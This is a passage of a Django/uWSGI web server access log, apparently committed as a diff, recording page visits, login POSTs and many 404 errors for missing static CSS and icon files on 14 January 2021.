0|req: 1422/1792] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1423/1793] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1424/1794] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1425/1795] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1426/1796] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1427/1797] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1428/1798] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:47:45 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1429/1799] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1430/1800] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:47:45 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1431/1801] 219.228.146.135 () {40 vars in 934 bytes} [Thu Jan 14 10:47:46 2021] GET /kind-manage/ => generated 9252 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1432/1802] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1433/1803] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1434/1804] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1435/1805] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1436/1806] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1437/1807] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1438/1808] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:47:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1439/1809] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:47:47 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1440/1810] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:47:47 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1441/1811] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:47:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1442/1812] 219.228.146.135 () {40 vars in 921 bytes} [Thu Jan 14 10:47:57 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1443/1813] 219.228.146.135 () {40 vars in 918 bytes} [Thu Jan 14 10:47:59 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1444/1814] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:48:07 2021] POST /login/ => generated 82 bytes in 7 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1445/1815] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:48:20 2021] POST /login/ => generated 82 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1446/1816] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:48:30 2021] GET /kind-manage/? => generated 9252 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1447/1817] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:48:30 2021] POST /kind-manage/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1448/1818] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1449/1819] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1450/1820] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:48:30 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1451/1821] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1452/1822] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1453/1823] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 50 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1454/1824] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1455/1825] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:48:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1456/1826] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:48:30 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1457/1827] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:48:31 2021] POST /login/ => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1458/1828] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:48:32 2021] GET /kind-manage/ => generated 10194 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1459/1829] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1460/1830] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1461/1831] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1462/1832] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1463/1833] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1464/1834] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1465/1835] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:48:32 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1466/1836] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:48:32 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1467/1837] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:48:32 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1468/1838] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:48:34 2021] POST /login/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1469/1839] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 10:48:34 2021] GET /home/ => generated 8342 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1470/1840] 219.228.146.135 () {40 vars in 934 bytes} [Thu Jan 14 10:48:39 2021] GET /ownpublish-0-0-0 => generated 8826 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1841] 219.228.146.135 () {38 vars in 816 bytes} [Thu Jan 14 10:48:39 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1842] 219.228.146.135 () {38 vars in 815 bytes} [Thu Jan 14 10:48:39 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 1471/1843] 219.228.146.135 () {40 vars in 944 bytes} [Thu Jan 14 10:48:41 2021] GET /ownpublish-0-0-0 => generated 8826 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1472/1844] 219.228.146.135 () {40 vars in 923 bytes} [Thu Jan 14 10:48:43 2021] GET /home/ => generated 8342 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1473/1845] 219.228.146.135 () {40 vars in 919 bytes} [Thu Jan 14 10:49:07 2021] GET /all-0-0-0 => generated 8615 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1474/1846] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:49:08 2021] POST /kind-manage/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1475/1847] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:49:08 2021] GET /kind-manage/? => generated 11136 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1476/1848] 180.160.49.168 () {40 vars in 894 bytes} [Thu Jan 14 10:49:08 2021] GET /kind-manage/ => generated 11136 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1477/1849] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1478/1850] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1479/1851] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1480/1852] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1481/1853] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1482/1854] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1483/1855] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:49:09 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1484/1856] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:49:09 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1485/1857] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:49:09 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1858] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 10:49:10 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 1486/1859] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:49:18 2021] GET /kind-manage/? => generated 11136 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1487/1860] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:49:18 2021] POST /kind-manage/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1488/1861] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1489/1862] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1490/1863] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1491/1864] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1492/1865] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1493/1866] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:49:18 2021] GET /static/css/spinners.css => generated 3516 bytes in 31 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1494/1867] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1495/1868] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:49:18 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1496/1869] 180.160.49.168 () {38 vars in 768 bytes} [Thu Jan 14 10:49:18 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1498/1870] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:49:26 2021] GET /kind-manage/? => generated 12084 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1498/1871] 180.160.49.168 () {48 vars in 978 bytes} [Thu Jan 14 10:49:26 2021] POST /kind-manage/? => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1500/1873] 180.160.49.168 () {38 vars in 839 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1501/1874] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1502/1874] 180.160.49.168 () {38 vars in 835 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1502/1875] 180.160.49.168 () {38 vars in 803 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1503/1876] 180.160.49.168 () {38 vars in 769 bytes} [Thu Jan 14 10:49:26 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1504/1877] 180.160.49.168 () {38 vars in 847 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1505/1878] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1506/1879] 180.160.49.168 () {38 vars in 879 bytes} [Thu Jan 14 10:49:26 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1507/1880] 180.160.49.168 () {38 vars in 771 bytes} [Thu Jan 14 10:49:26 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 11057|app: 0|req: 1508/1881] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 10:49:42 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1509/1882] 180.160.49.168 () {40 vars in 897 bytes} [Thu Jan 14 10:49:54 2021] GET /announcement/ => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1510/1883] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1511/1884] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1512/1885] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1513/1886] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1514/1887] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:49:54 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: 